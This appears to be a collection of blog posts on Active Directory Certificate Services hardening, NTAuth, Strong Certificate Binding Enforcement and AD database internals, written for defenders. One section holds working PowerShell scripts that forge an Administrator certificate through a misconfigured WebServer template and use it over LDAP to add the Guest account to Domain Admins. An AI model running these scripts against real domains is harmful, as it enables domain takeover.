So I have been back in Sweden for about two weeks, working in an intense project with PKI (AD CS, Venafi, PointSharp NetID Portal, and Thales Luna HSMs) as well Active Directory and tiering.
Issues and challenges with “Supply in the request” (SITR) – Certificate Templates
How NTAuth works and what it means if a Certificate Authority is trusted in NTAuth
That the new Strong Certificate Binding Enforcement is a response to CVE-2022-34691, CVE-2022-26931, CVE-2022-26923 and is NOT designed to resolve the challenges with “Supply in the request” (SITR) – Certificate Templates
That templates that lack the – Client Authentication EKU (1.3.6.1.5.5.7.3.2) might be subject anyway for PKINIT and Schannel.
Let’s talk about possibilities to mitigate – the first ability is to design your PKI Hierarchy so that you have at least two CAs where one of them is trusted in NTAuth and the other isn’t.
Design 1 – Preferred works for most organizations
Issuing CA 1 (AD CS) – Installed as Enterprise CA trusted in NTAuth – Issues certificates used for authentication such as Smart Card/Yubikey PIV, 802.1x (Only important if you’re running NPS in particular) and any other certificate where the subject is built from the Active Directory user or computer. This CA should never have certificate templates published with “Supply in the request” (SITR).
Issuing CA 2 (AD CS) – Installed as Enterprise CA (The CA is going to be initially trusted in NTAuth as it’s installed as an Enterprise CA and has to be installed by an Enterprise Admin within the forest or by an account that is delegated to write to the NTAuth object anyway) –
Important! This CA has to be removed from NTAuth manually and repeatable have to be so every time the CA certificate is renewed. Read more about NTAuthGuard by Carl Sörqvist further down as a automated solution for this task
This CA as it is installed as an Enterprise CA will still have the capability to publish certificates and enable auto-enrollment to clients/servers and is intended as a SSL-TLS CA and can safely publish certificate templates where the subject can be supplied aka “Supply in the request” (SITR)
However there is some more restrictions that should be performed on this CA – I would recommend to disable the following extensions so the CA never can include them in any certificates:
DisableExtensionList +1.3.6.1.4.1.311.25.2 (SID) – The SID extension is not needed as this CA should never issue any certificates used for authentication and there for do not need to be compliant with the Strong Certificate Binding Enforcement requirements.
DisableExtensionList +1.3.6.1.4.1.311.21.10 (App Policies) – This is a legacy proprietary extension that would allow the requester to supply a EKU within the request of choice on templates that are missing the ‘msPKI-Certificate-Application-Policy Attribute’ attribute – typically v1 templates as the built-in ‘WebServer’ template, but not limited to.
Note the ‘DisableExtensionList’ can be set using the certutil command line utility – for example:
Secure – Supply in the request (SITR) templates additionally – As an extra safety precaution I recommend that SITR templates are configured with the ‘msPKI-Enrollment-Flag‘ attribute to contain the new bit/flag ‘0x00080000 – CT_FLAG_NO_SECURITY_EXTENSION’ to make sure that certificates generated by those templates never can include the SID extension regardless on which CA they are published on (as long as we’re speaking AD CS)
Design 1 and Tiering – Note that this design requires both “Issuing CA 1” and “Issuing CA 2” to be managed from T0, however to be clear they can both issue certificates to clients/servers in all tiers and you can even delegate certificate manager responsibilities to T1 on “Issuing CA 2” – what you can’t do however is allowing T1 to logon to interactively to “Issuing CA 2”.
Design 1 – Design Rational – Some will probably argument that why not just have one Enterprise CA and make sure that all the “Supply in the request” (SITR) templates are configured to have certificate manager approval required – sure this can work for small businesses, also remember that each request must be reviewed be for approved by a T0 administrator – they typically have other things to do.
The hygiene factor is hard if it’s not automated – reporting templates that have “Supply in the request” (SITR) enabled and lacking the certificate manager approval requirement or even remediate them – when performing security assessments at Epical we always se the left-overs of templates where someone just wanted to test something or was in a hurry and might intended to change the settings back to what they should be, this design minimize those mistakes as well and it’s fairly easy to script compliance checks when the CAs are split up-on the type of templates they should publish.
Have a sample script for that:
NTAuthGuard by Carl Sörqvist So NTAuthGuard is a solution from Carl Sörqvist that will help us with the fact that in Design 1 as mentioned above both “Issuing CA 1” and “Issuing CA 2” are AD CS Enterprise CAs mening they will both publish and trust them self in NTAuth and has to be installed by an Enterprise Admin within the forest or by an account that is delegated to write to the NTAuth object anyway, “Issuing CA 2” needs to be removed manually and repeatable have to be so every time the CA certificate is renewed.
NTAuthGuard allows us to define a whitelist by CA certificate thumbprints that is allowed to be trusted in NTAuth – the script can log events if a CA certificate that is not whitelisted is being trusted in NTAuth or even take action and remove the none-whitelisted CA certificate from NTAuth.
Last week I presented my session “When your Enterprise PKI becomes one of your enemies” at the Hybrid Identity Protection (HIP) Conference 2024 in New Orleans – Thanks to all who attended my session and for all of the follow up questions I got later during the conference and now also on social media and e-mail – I’m very sorry that my two last demos didn’t work, the reason for that was some issues with the CDP in my demo environment the KDC didn’t consider it’s own certificate valid for PKINIT hence the problem.
The first part of the presentation outlined something very common and dangerous that we already see today, Enterprise CA’s trusted for authentication against Active Directory – publishing certificate templates that allow the subject to be supplied in the request (SITR)
But how can you determine if a CA is trusted for authentication against Active Directory? It’s either trusted in NTAuth + Leaf certificates and KDC certificates have their full chain trusted and is valid – this allows for implicit/explicit UPN mapping e.g. the SAN in the certificate matches the userPrincipalName attribute of the user within Active Directory. If the CA is not trusted in NTAuth only explicit mapping is available using the altSecurityIDs attribute + Leaf certificates and KDC certificates have their full chain trusted and is valid.
By default if you install an Enterprise CA using Active Directory Certificate Services (AD CS) – it will be trusted in NTAuth.
Above you can see the requirements to be trusted to authenticate to Active Directory using certificates – Note that Schannel in the S4U2Self scenarios involves the KDC and the authentication part contains to either NTAuth (implicit mapping) or AltSecID (explicit mapping)
The methods with blue color are required to be considered strong according to the Strong Certificate Binding Enforcement (more on that later 1)
Active Directory So let’s have a look how NTAuth – CA’s trusted in NTAuth are stored at the following location ‘CN=NTAuth,CN=Public Key Services,CN=Services,DC=Configuration,DC=X’ in Active Directory and their thumbprint in the multi-valued attribute ‘cACertificate’
Clients On every domain joined computer a copy of all the trusted CA’s in the above attribute are stored in the registry at the following location: ‘HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\NTAuth\Certificates’ where one key for each CA is created and named after the thumbprint of the CA certificate.
Group Policy Autoenrollment Client Side Extension (CSE) Supposed to cache the content from AD to the Registry on each domain joined machine within the forest (Including DCs).
So who is validating that the CA is trusted in NTAuth?
Domain Controllers / KDC (if not explicit mapping using AltSecID)
Network Policy Server (NPS)
LDAP-STARTTLS
IIS – SCHANNEL
ADFS – SCHANNEL (Even if explicit mapping exist using AltSecID)
Enrollment of templates that have private key archival enabled
So how is the validation that the CA is trusted in NTAuth performed? If we’re online we’re taking a trip to ‘CN=NTAuth,CN=Public Key Services,CN=Services,DC=Configuration,DC=X’ using LDAP right?
Nope – Verification is done using a API: We’re calling into crypt32.dll?CertVerifyCertificateChainPolicy with the ‘CERT_CHAIN_POLICY_NT_AUTH’ flag
Note: You can test this using PowerShell: Test-Certificate -Cert $cert -Policy NTAUTH
If the certificate chain is valid from Leaf Certificate to the Root CA Certificate and that the full chain is trusted.
Verify that the CA directly above the Leaf Certificate is trusted in NTAuth – this check is done locally by looking in the registry on the client ‘HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\NTAuth\Certificates’ – the API never asks Active Directory.
What is Strong Certificate Binding Enforcement? Strong Certificate Binding is a response to CVE-2022-34691, CVE-2022-26931 and CVE-2022-26923 address an elevation of privilege vulnerability that can occur when the Kerberos Key Distribution Center (KDC) is servicing a certificate-based authentication request. Before the May 10, 2022 security update, certificate-based authentication would not account for a dollar sign ($) at the end of a machine name. This allowed related certificates to be emulated (spoofed) in various ways. Additionally, conflicts between User Principal Names (UPN) and sAMAccountName introduced other emulation (spoofing) vulnerabilities that we also address with this security update. More information can be found here: KB5014754: Certificate-based authentication changes on Windows domain controllers and here: Certifried: Active Directory Domain Privilege Escalation (CVE-2022–26923) | by Oliver Lyak | IFCR
Specifically this protects from the following four scenarios:
dNSHostName/servicePrincipalName computer owner abuse, Remove DNS SPNs from servicePrincipalName, steal DNS hostname of a DC, put it in your computer accounts dNSHostName attr and request a cert, auth with the cert and you’re a DC.
Overwrite userPrincipalName of user to be of target to hijack user account since the missing domain part does not violate an existing UPN
Overwrite userPrincipalName of user to be @ of target to hijack machine account since machine accounts don’t have a UPN
Delete userPrincipalName of user and overwrite sAMAccountName to be without a trailing $ to hijack a machine account
Note: 2-4 would require permissions to write to the ‘userPrincipalName’ attribute
So how is Strong Certificate Binding Enforcement implemented?
As outlined in KB5014754: Certificate-based authentication changes on Windows domain controllers once we’re in Full Enforcement mode there is only 3 ways to stay compliant – otherwise certificate based authentication is going to fail against Active Directory – Full Enforcement mode is planned to February 11, 2025 by default with an option to opt-out until September 10, 2025 by explicit configuring your domain controllers to be in Compatibility Mode. But if you have NOT already by yourself rolled into Enforcement Mode -It means your Active Directory is still vulnerable to those CVEs
Options to be compliant with Strong Certificate Binding Enforcement
Method
Requirements
Certificate Re-issue
Certificate SID Extension
Certificate must contain the ‘1.3.6.1.4.1.311.25.2’ SID Extensions that encodes the user or computers SID hat the certificate issued for/to be used for authentication with
Yes
SAN URL
The SAN of the certificate must contain one entry of the type URL and have a value of “•tag:microsoft.com,2022-09-14:sid:<value>” where <value> is the user or computers SID that the certificate issued for/to be used for authentication with, this is only accepted on the KDC for Windows Server 2025-Windows Server 2019 DCs
Yes
AltSecID
Using the ‘altSecurityIDs’ attribute to strongly map the certificate to the user or computer the certificatre is issued for/to be used for authentication with – only the following mapping methods are considered strong: – X509IssuerSerialNumber “X509:<I>IssuerName<SR>1234567890” -X509SKI “X509:<SKI>123456789abcdef” -X509SHA1PublicKey “X509:<SHA1-PUKEY>123456789abcdef”
No
Issuer-OID-MappingType triplet
More information will be available shortly.
No, if Issuer OID is present
Supply in the request (SITR) without Client Authentication EKU in the template
One of the requirements for the KDC to accept a certificate for authentication using PKINIT is that the EKU is containing either Client Authentication (1.3.6.1.5.5.7.3.2) or id-pkinit-KPClientAuth (1.3.6.1.5.2.3.4) or Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
Microsoft have a proprietary extension called a Certificate Application Policy and it’s used as an EKU – Defined by this attribute on certificate templates “msPKI-Certificate-Application-Policy Attribute” as this attribute isn’t populated (is empty) on certificate templates that are v1 templates, this attribute can be supplied in the request exactly the same way as we could supply a SAN.
Microsoft issued a statement on this just the day before my presentation on the Hybrid Identity Protection (HIP) Conference 2024 in New Orleans – the statement from MSRC can be found here: Active Directory Certificate Services Elevation of Privilege Vulnerability – CVE-2024-49019 but it’s not telling you the entire truth about how this works, peer see this has nothing to with if the template is v1 or not, it has to do with and only with if the “msPKI-Certificate-Application-Policy” attribute is populated or not, if you copy a v1 template let’s say you copy the default ‘WebServer’ template, its upgraded and the values in ‘pKIExtendedKeyUsage’ are copied by the ‘Certificate Template’ MMC into ‘msPKI-Certificate-Application-Policy’ and you’re safe – so what is not being told here:
If you have a v2 template let’s say and don’t define EKUs or having msPKI-Certificate-Application-Policy empty – you’re as well subject to having EKUs supplied in the request and this is regardless template version. Is there any real world scenarios for this – well here is an example of a vendor who guides certificate templates to be created this way: Create and Add a Microsoft Certificate Authority Template
Let’s try using this by showing some sample code – For this to work we assume that the default template ‘WebServer’ is published at an Enterprise CA named ‘nttest-ca-01.nttest.chrisse.com\Chrisse Issuing CA 1’ and that it is trusted in NTAuth in a forest with a root domain named nttest.chrisse.com and that the built-in administrator account exists by it’s default name – to utilize this the enrollment permissions needs to be granted either to a user or computer within the forest.
1. WebServer-AppPolicy.ps1
Import-Module-Name CertRequestTools#CA1 IS Trusted in NTAuth$CA1 ="nttest-ca-01.nttest.chrisse.com\Chrisse Issuing CA 1"$ApplicationPoliciesExtension =New-Object-ComObject X509Enrollment.CX509ExtensionMSApplicationPolicies$ApplicationPolicyOids =New-Object-ComObject X509Enrollment.CCertificatePolicies.1$ApplicationPolicyOid =New-Object-ComObject X509Enrollment.CObjectId$ApplicationPolicyOid.InitializeFromValue('1.3.6.1.5.5.7.3.2') #Client Authentication EKU$CertificatePolicy =New-Object-ComObject X509Enrollment.CCertificatePolicy$CertificatePolicy.Initialize($ApplicationPolicyOid)$ApplicationPolicyOids.Add($CertificatePolicy)$ApplicationPoliciesExtension.InitializeEncode($ApplicationPolicyOids)$ManagedApplicationPoliciesExtension =[System.Security.Cryptography.X509Certificates.X509Extension]::new($ApplicationPoliciesExtension.ObjectId.Value,`[Convert]::FromBase64String($ApplicationPoliciesExtension.RawData(1)), $ApplicationPoliciesExtension.Critical)New-PrivateKey-RsaKeySize 2048-KeyName ([Guid]::NewGuid()) |New-CertificateRequest-Subject "CN=DEMO1"`-UserPrincipalName administrator@nttest.chrisse.com `-OtherExtension $ManagedApplicationPoliciesExtension |`Submit-CertificateRequest-ConfigString $CA1 -Template WebServer |`Install-Certificate-Name My -Location CurrentUser
So now we have a certificate with the UPN of the built-in administrator (RID 500) and we supplied the required Client Authentication EKU in the request using the ‘Web Server’ template so our certificate with the subject “CN=DEMO1” should be able to authenticate and become the Administrator account RID500. To do this we use another script to perform LDAP-STARTTLS – select the certificate issued by the previous script when prompted: Note: Change the domain controller from ‘nttest-dc-01.nttest.chrisse.com’ to your own DC, the KDC on the must be capable of performing PKINIT e.g. have valid KDC certificate.
LDAP-TLSv2.ps1
Add-Type-AssemblyName System.DirectoryServices.ProtocolsAdd-Type-AssemblyName System.Security# Change the domain controller to your own DC instead of 'nttest-dc-01.nttest.chrisse.com'$Id =New-Object-TypeName System.DirectoryServices.Protocols.LdapDirectoryIdentifier -ArgumentList 'nttest-dc-01.nttest.chrisse.com',389,$true,$false$Ldap =New-Object-TypeName System.DirectoryServices.Protocols.LdapConnection -ArgumentList $Id,$null, ([System.DirectoryServices.Protocols.AuthType]::External)$Ldap.AutoBind =$false"Certificate selection"|Write-Host$Location = [System.Security.Cryptography.X509Certificates.StoreLocation]::CurrentUser$Name = [System.Security.Cryptography.X509Certificates.StoreName]::My$Store =New-Object-TypeName System.Security.Cryptography.X509Certificates.X509Store -ArgumentList $Name, $Location$Store.Open("ReadOnly, MaxAllowed, OpenExistingOnly")$Cert = [System.Security.Cryptography.X509Certificates.X509Certificate2UI]::SelectFromCollection($Store.Certificates.Find("FindByKeyUsage",0xa0,$true).Find("FindByExtension","2.5.29.35",$true),"Certificate selection","Select a certificate","SingleSelection")$Store.Dispose()$Ldap.ClientCertificates.Clear()[void]$Ldap.ClientCertificates.Add($Cert[0])$Ldap.SessionOptions.QueryClientCertificate = {param( [System.DirectoryServices.Protocols.LdapConnection] $Connection, [Byte[][]] $TrustedCAs )return $Cert[0]}"Starting TLS"|Write-Host$Ldap.SessionOptions.StartTransportLayerSecurity($null)$RootDseSearchRequest =New-Object-TypeName System.DirectoryServices.Protocols.SearchRequest -ArgumentList '',"(&(objectClass=*))","Base"Try{ $RootDseSearchResponse =$null $RootDseSearchResponse = $Ldap.SendRequest($RootDseSearchRequest)}Catch{ $Ldap.Dispose()throw$_}"Default naming context: {0}"-f $RootDseSearchResponse.Entries[0].Attributes["defaultNamingContext"].GetValues([String])"Binding"|Write-HostTry{ $Ldap.Bind()}Catch{throw}# Send an Extended WHOAMI request$ExtReq =New-Object-TypeName System.DirectoryServices.Protocols.ExtendedRequest -ArgumentList "1.3.6.1.4.1.4203.1.11.3"$ExtRes = [System.DirectoryServices.Protocols.ExtendedResponse] $Ldap.SendRequest($ExtReq)"Bound as identity: '{0}'"-f [System.Text.Encoding]::UTF8.GetString($ExtRes.ResponseValue)# Change to a user you want to add to domain admins $UserDN ="CN=Guest,CN=Users,DC=nttest,DC=chrisse,DC=com""Adding '{0}' to Domain Admins"-f $UserDN$Modify = [System.DirectoryServices.Protocols.ModifyRequest]::new("CN=Domain Admins,CN=Users,DC=nttest,DC=chrisse,DC=com","Add","member", $UserDN)Try{ $Response = $Ldap.SendRequest($Modify)}Catch{ $Response =$_.Exception.GetBaseException().Response}"Result: {0}"-f $Response.ResultCode$Ldap.Dispose()
Supply in the request (SITR) with Strong Certificate Binding Enforcement
If we now enable Strong Certificate Binding Enforcement on our KDCs / Domain Controllers by setting/creating the following registry key: “HKLM\SYSTEM\CurrentControlSet\Services\Kdc\StrongCertificateBindingEnforcement” as type DWORD and set the value to “2” – Strong Certificate Binding Enforcement is now enabled
We can verify this by trying to authenticate with the certificate already issued above, with the subject CN=DEMO1 – simply run LDAP-STARTTLS – select the certificate issued by the previous script when prompted.
This time the authentication should fail, this is expected as the certificate would not be compliant with Strong Certificate Binding Enforcement, It doesn’t contain the SID extension, neither a SAN with the SID or are being explicit mapped in the altSecID attribute.
So this means that once we reach Strong Certificate Binding Enforcement on all our KDCs / Domain Controllers we’re safe from this supply in the request madness right? Absolutely NOT. Because what if the SID extension could also be supplied in the request?
Let’s issue a certificate once again using the same template ‘WebServer’ but supply a SID as well.
2. WebServer-AppPolicySCBE.ps1
Import-Module-Name CertRequestTools#CA1 IS Trusted in NTAuth$CA1 ="nttest-ca-01.nttest.chrisse.com\Chrisse Issuing CA 1"# Insert the SID as szOID_NTDS_CA_SECURITY_EXT certificate extension$SidExtension =New-SidExtension-NTAccount NTTEST\Administrator$ApplicationPoliciesExtension =New-Object-ComObject X509Enrollment.CX509ExtensionMSApplicationPolicies$ApplicationPolicyOids =New-Object-ComObject X509Enrollment.CCertificatePolicies.1$ApplicationPolicyOid =New-Object-ComObject X509Enrollment.CObjectId$ApplicationPolicyOid.InitializeFromValue('1.3.6.1.5.5.7.3.2') #Client Authentication EKU$CertificatePolicy =New-Object-ComObject X509Enrollment.CCertificatePolicy$CertificatePolicy.Initialize($ApplicationPolicyOid)$ApplicationPolicyOids.Add($CertificatePolicy)$ApplicationPoliciesExtension.InitializeEncode($ApplicationPolicyOids)$ManagedApplicationPoliciesExtension =[System.Security.Cryptography.X509Certificates.X509Extension]::new($ApplicationPoliciesExtension.ObjectId.Value,`[Convert]::FromBase64String($ApplicationPoliciesExtension.RawData(1)), $ApplicationPoliciesExtension.Critical)New-PrivateKey-RsaKeySize 2048-KeyName ([Guid]::NewGuid()) |`New-CertificateRequest-Subject "CN=DEMO2"`-UserPrincipalName administrator@nttest.chrisse.com `-OtherExtension $SidExtension,$ManagedApplicationPoliciesExtension |`Submit-CertificateRequest-ConfigString $CA1 -Template WebServer |`Install-Certificate-Name My -Location CurrentUser
Now you should have a issued certificate with the subject “CN=DEMO2” – Now use the LDAP-STARTTLS script again to authenticate using the new certificate, make sure you select the right certificate, if you want to be sure you can just open certmgr.msc and delete “CN=DEMO1”
You should now have been authenticated and the KDC / Domain Controller is in Strong Certificate Binding Enforcement mode.
To wrap up this first blog post that is an attempt to cover what is presented in the first part of my session “When your Enterprise PKI becomes one of your enemies” at the Hybrid Identity Protection (HIP) Conference 2024 in New Orleans last week there is some key take aways.
“Strong Certificate Binding Enforcement” will not help you with bad certificate template hygien at all it was designed to prevent CVE-2022-34691, CVE-2022-26931 and CVE-2022-26923.
Certificate Templates without the ‘msPKI-Certificate-Application-Policy’ is subject to EKUs being supplied in the request regardless of template version.
Equally – Certificate Templates with at least one EKU in ‘msPKI-Certificate-Application-Policy’ is protected. (You can patch the default v1 ‘WebServer’ if you want) – I’m not in any way recommending to use v1 templates .
Next part will look into how all this can be mitigated by choosing the right design and how templates can be optimally configured – but after that I’m going to cover some of the real bad scenarios.
This blog post will describe and go into details about the may not so known Active Directory Database Epoch / Copy Protection.
This concept that was introduced with Active Directory Application Mode) ADAM initial release (Now follows some ADAM history), but never made it to Active Directory Domain Services (AD DS) until Longhorn/WS2008 for some good reasons. One of the changes with Windows Server 2008 was that AD got exposed as a windows service allowing admins to stop, restart and start the service on DCs, this behavior already existed since day one in Active Directory Application Mode (ADAM ) first introduced as a standalone package to the web in November 2003 and was also targeting Windows XP, in Windows Server 2003 R2, Active Directory Application Mode (ADAM) Service Pack 1 (SP1) is included as a windows component (On CD2) but still ship as a download for other operating systems, Active Directory Application Mode (ADAM) Service Pack 2 (SP2) is the latest version to ship except some QFEs and Security Updates before the source code of Active Directory Application Mode (ADAM) merges into the Directory Service (DS) source depot, integrates into windows builds and get’s available again with Windows Server 2008/Windows 7 rebranded as Active Directory Lightweight Directory Service (AD LDS) as an installable role with the operating system – no more downloads are available.
The potential issues and damages that this feature is trying to protect from, given the above.
Pre-Windows Server 2008 and ADAM it wasn’t that easy to manually restore or replace the database (DIT) using none supported restore methods for let’s say average sysadmins – you needed to boot into DSRM – Directory Services Restore Mode cause the DB was locked by LSASS/ESE and the database by default was located under C:\Windows folder.
Now with these requirements gone as peer Windows Server 2008 and ADAM/AD LDS – Microsoft wanted to prevent some scenarios:
Potentially foreseen scenarios:
• Stop service, copy off database, restart service, make changes that replicate, stop service, copy old database back in.
• Stop service, copy off database from instance1, stop second service, copy database over data files for instance2.
Both these scenarios breaks the Active Directory replication model, because two different/distinct changes could get the same <OriginatingInvocationID>:<OriginatingUSN> pair (lets call this the ChangeID). If two changes have the same ChangeID, one of those two changes would fail to replicate, because the DSA will claim to have “seen” the change with the same ChangeID, from the previous instance of the database, and fail to replicate the new change with this ChangeID. Also, other partners of this instance, will assume they’ve seen any new changes made that match previous changes this DSA has replicated out.
The implementation – a database epoch stored in both in the database (DIT) and the registry, during initialization of the DSA and the DB a random value is written in case of a none-existent epoch or the current epoch +1 is written both to the database (DIT) – more specifically to the “epoch_col” column in the hiddentable and the “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters\ DSA Database Epoch” Registry DWORD.
Rules are as following
If both the registry and the database have NULL – it’s considered a match. The epoch is initially set with rand() in both the database and the registry
if the value stored in the database is > than the value stored in the registry – it’s considered a match.
If the value stored in the database and the registry match – it’s considered a match
If either 2 or 3 the epoch is advanced by 1 in both the database and the registry, if any of the updates fail the ESE update to the DIT is rolledback.
If the “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters\ Disable DSA Database Epoch Check” Registry DWORD is set to 1 it’s considered a match.
If the values do not match as per above 1-3, a “restore” is forced to get a new invocationID for the DSA/DRA and the following event is logged:
Table 1: Epoch mismatch and restore initiated.
Event ID
Source
Category
Description
2524
ActiveDirectory_DomainService
Backup
The Directory Server detected that the database has been replaced. This is an unsafe and unsupported operation. User Action: None. Active Directory Domain Services was able to recover the database in this instance, but this is not guaranteed in all circumstances. Replacing the database is strongly discouraged. The user is strongly encouraged to use the backup and restore facility to rollback the database.
The “restore” is forced by writing/setting the “state_col” in the “hiddentable” to “4” aka “BackedupDIT” as well “uns_col” to next USN-1 and “backupexpiration_col” to the next day.
If there is any other failure than retrieving the epoch from the database than that the column is null/nonexistent or that the registry value is nonexistent – the DSA is going to fail init and stop hard with the error message:
Table 2: Epoch mismatch fatal
Event ID
Source
Category
Description
2542
ActiveDirectory_DomainService
Backup
The Directory Server detected that the database has been replaced. This is an unsafe and unsupported operation. The service will stop until the problem is corrected. User Action: Restore the previous copy of the database that was in use on this machine. In the future, the user is strongly encouraged to use the backup and restore facility to rollback the database. This error can be suppressed and the database repaired by removing the following registry key. Additional Data Registry key: System\CurrentControlSet\Services\NTDS\Parameters Registry value: DSA Database Epoch
Note that this feature could have been implemented differently, technically there is no need to change/advance the epoch each time during init, not even during an originate write to the database (DIT) – however it must only really change if a new originate write is replicated off the local DSA.
I wrote this blog post because I got a question – “So what happens when distribution DIT is mounted” – If you don’t know what the distribution DIT is you can read about it here: https://blog.chrisse.se/?p=1005
The answer to the question can be figured out by reading this post (Rule 1 above), The answer explained is that the “epoch_col” is NULL in the Distribution DIT and once the DSA Initialize on the Distribution DIT for the first time the registry value don’t exist and peer above that is considered a match, a random value is written as the initial epoch to both the database (DIT) and the registry on the DSA.
Bonus: the “state_col” of a distribution DIT should be “1”.
It will NOT remove FAS (Filtered Attribute Set) from the link_table? Can you even have that? Sure in the “link_data” column for the string/data portion of a linked attribute with syntax DN-String or DN-binary: https://learn.microsoft.com/en-us/windows/win32/adschema/syntaxes
Dumping the “link_table” from a Windows 2000 Server DC just because there are only a few initial columns in the table initially at Windows 2000 DCs and I have all kinds of DIT’s around for testing when I write tools.
So now we’re coming to the scrubbing part – Let’s say you used the VSS API and the NTDS Writer with the “RODC_REMOVE_SECRETS;” _AND_ cleaned up any potential linked FAS attribute that stored it’s data in the ‘link_data” column by your own.
Would the NTDS.DIT be secure? Nope – you need to scrub your DIT so it becomes secure. You just call into esent.dll?JetDBUtilitiesW and ask for a scrub operation (opDBUTILEDBScrub) to take place, if I say securing the DIT instead of scrubbing, sounds more familiar to you?
So why is this done? Well the “NTDS Writer” with the “RODC_REMOVE_SECRETS;” just call regular jet/esent APIs to delete the columns/attributes that contained hidden, secret or FAS data – and that is what you’re doing in the “link_table” as well but it’s more complicated as we can’t drop the entire column, instead the value for a specific row representing the linked attribute need to reset the data in the “link_data” column using for example JetSetColumn | JetSetColumnDefaultValue
Regardless of the above, there is no guarantee that all metadata and left over data isn’t still present somewhere in the database – hence the need to secure / scrub the DIT.
By the way you don’t need to write up your own code and call into esent.dll?JetDBUtilitiesW you can just use the undocumented option “Z” of esentutl.exe that has been there since Windows Server 2008:
So every Windows Server has an NTDS.dit file right? Well, All Windows Server – Domain Controllers you mean right? Nope they in fact have two J
There is something referred to as the distribution DIT that works as a template DIT and is used when you promote a machine to a DC (either ADAM/ADLDS or ADDS) either as the first dc in a forest or as a replica.
The distribution DIT can be found at the following location:
Table 1: Distribution DIT Location
Location
Location
SXS
OS
ADDS
%windir%\system32\ntds.dit
N/A
Windows 2000 Server
Windows Server 2003
ADDS
%windir%\system32\ntds.dit
Yes
Windows Server 2008
Windows Server 2008 R2
Windows Server 2012
Windows Server 2012 R2
ADAM/ADLDS
%windir%\ADAM\adamntds.dit
N/A
Windows XP * Separate download
Windows Server 2003 * Separate download or R2
ADAM/ADLDS
%windir%\ADAM\adamntds.dit
Yes
Windows Vista * Separate download
Windows 7 * Separate download
Windows 8
Windows Server 2008
Windows Server 2008 R2
Windows Server 2012
Windows Server 2012 R2
Note: SxS means that the files are package in the SxS folder on the disk and isn’t copied into the location until the actual role is installed.
So what is the Distribution DIT and when is it used?
It’s actually the DIT all DCs start out with except one case
The distribution DIT is copied to the database location (DatabasePath) specified in DCPROMO during promotion, we can verify this by checking the JET database signature of the two databases once DCPROMO has completed, in my case I compare between the distribution DIT for ADLDS and my installed ADLDS instance ‘ESEDEV’
Distribution DIT:
Installed/Promoted DIT:
As you can see – They do match.
So what does the Distribution DIT contains?
The distribution DIT contains the base schema for either ADDS or ADLDS (that has a more light weight schema that ADDS) – So here my tool ESEDump comes into play, let’s dump a distribution DIT for ADLDS:
Dumping table datatable:
We can see that the first rows inside the distribution DIT contains O=Boot and CN=Schema,O=Boot, CN=BootMachine,O=Boot and then simpely the schema comes, we can see that all of the schema objects has a PDNT that equals == 5, the DNT of the CN=Schema,O=Boot naming context (NC) – Or wait are they really NCs? – let’s add in ‘instanceType’
Yes they are NCs – InstanceType decoded as follows:
So what is CN=BootMachine? This is a fake DSA so that the code can use common routines during install (Can’t explain it better than starting an entire new article – might happen someday)
So what happens during install?
So it’s time to determine how the schema in the distribution DIT is used during install (or promotion of a new domain controller) – well it depends – if it’s used at all.
These are the different cases.
Promoting the first domain controller in a forest:
The distribution DIT is copied into the database location (DatabasePath) specified in DCPROMO.
A domain naming context is created in the DIT (except for ADAM/ADLDS)
A configuration naming context is created in the DIT.
A schema naming context is created in the DIT.
The boot schema is moved from CN=Schema,O=Boot to the newly create schema naming context.
During this move the following happens for all objects that has a PDNT of:4 e.g. the CN=Schema,O=Boot:
Object’s are moved to CN=Schema,CN=Configuration,X=foo
As the object’s are moved their ancestors_col must be updated in the DIT to inheritance from the new CN=Schema,CN=Configuration,X=foo
As the object’s are moved from one naming context (NC) (CN=Schema,O=Boot) to another (CN=Schema,CN=Configuration,X=foo) their NCDNT_col in the DIT needs to be updated as well.
Object’s have their metadata updated , fields updated are:
OriginatingDsa
timeChanged
Give the object a new GUID.
Set a default security descriptor depending on ADDS or ADLDS and depending on if attribute or class.
The prefixMap is read of CN=Schema,O=Boot and saved into the prefixMap of CN=Schema,CN=Configuration,X=foo More information on the prefixMap/prefixTable can be found here: http://msdn.microsoft.com/en-us/library/cc228445.aspx
Note: This allows the distribution DIT to contain schema entries that the DSA doesn’t have knowledge about (e.g. other attributes and classes than the base schema can come pre-loaded) – This used to be the case for Small Business Server that pre-loaded the Exchange Schema.
Removing CN=BootMachine,O=Boot
Removing CN=Schema,O=Boot
Removing O=Boot
Promoting a replica in an already existing forest:
Remove the following as a schema already exists in the enterprise and will be replicated in.
Removing all object’s with a PDNT of 4 == e.g. all objects that have CN=Schema,O=Boot as parent.
Removing CN=BootMachine,O=Boot
Removing CN=Schema,O=Boot
Removing O=Boot
Both in case A (First DC in the forest) and case B (Replica in an existing forest) – the install code will trigger the garbage collector so it can immediately delete all traces of the O=Boot naming context (NC) and its decadent object’s.
This article started out by a question that was – How can the Schema naming context (NC) has a higher USN than many of the attributes in the schema – Doesn’t the schema container have to be created first, before its child objects? – Well we know the answer to that question already but let’s confirm it.
Let’s get the “usnCreated” on the Schema naming context (NC):
Ok, it’s 4100.
Let’s try an attribute “Account-Expires”
OK, that’s a pretty low “usnCreated” and much lower than the Schema naming context (NC) above.
So let’s look up the “Account-Expires” in the distribution DIT:
Yes , “usnCreated” is 6 in the distribution DIT as well, with other words “usnCreated” will come from the distribution DIT for base schema object’s, hence they have a lower usnCreated than the schema naming context (NC) itself.
I just played along with a Windows Server 2012 R2 DC and noticed a undocumented registry key (this might was added in already in Windows Server 2012) but is not in Windows Server 2008 R2 or earlier releases – The key are:
‘Subschema modifyTimeStamp behavior’ DWORD registry values can be configured within the following key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\<INSTANCE>\Parameters. Note: if the key doesn’t exist or have a value of 0 the default behavior will apply.
But what happens, and what works different if a value of ‘1’ is used?
It seems like we’re getting the time of when the schema actually was updated, and not just when the schemaCache was updated – as the ‘modifyTimeStamp’ attribute will indicate by its default behavior if you request it over the subschema. I compared the time of ‘modifyTimeStamp’ and the metadata for the ‘schemaInfo’ attribute to verify this (more on that attribute another day, if someone want?)
So what can this be used for? I have no idea J One can just read off the schemaInfo instead.
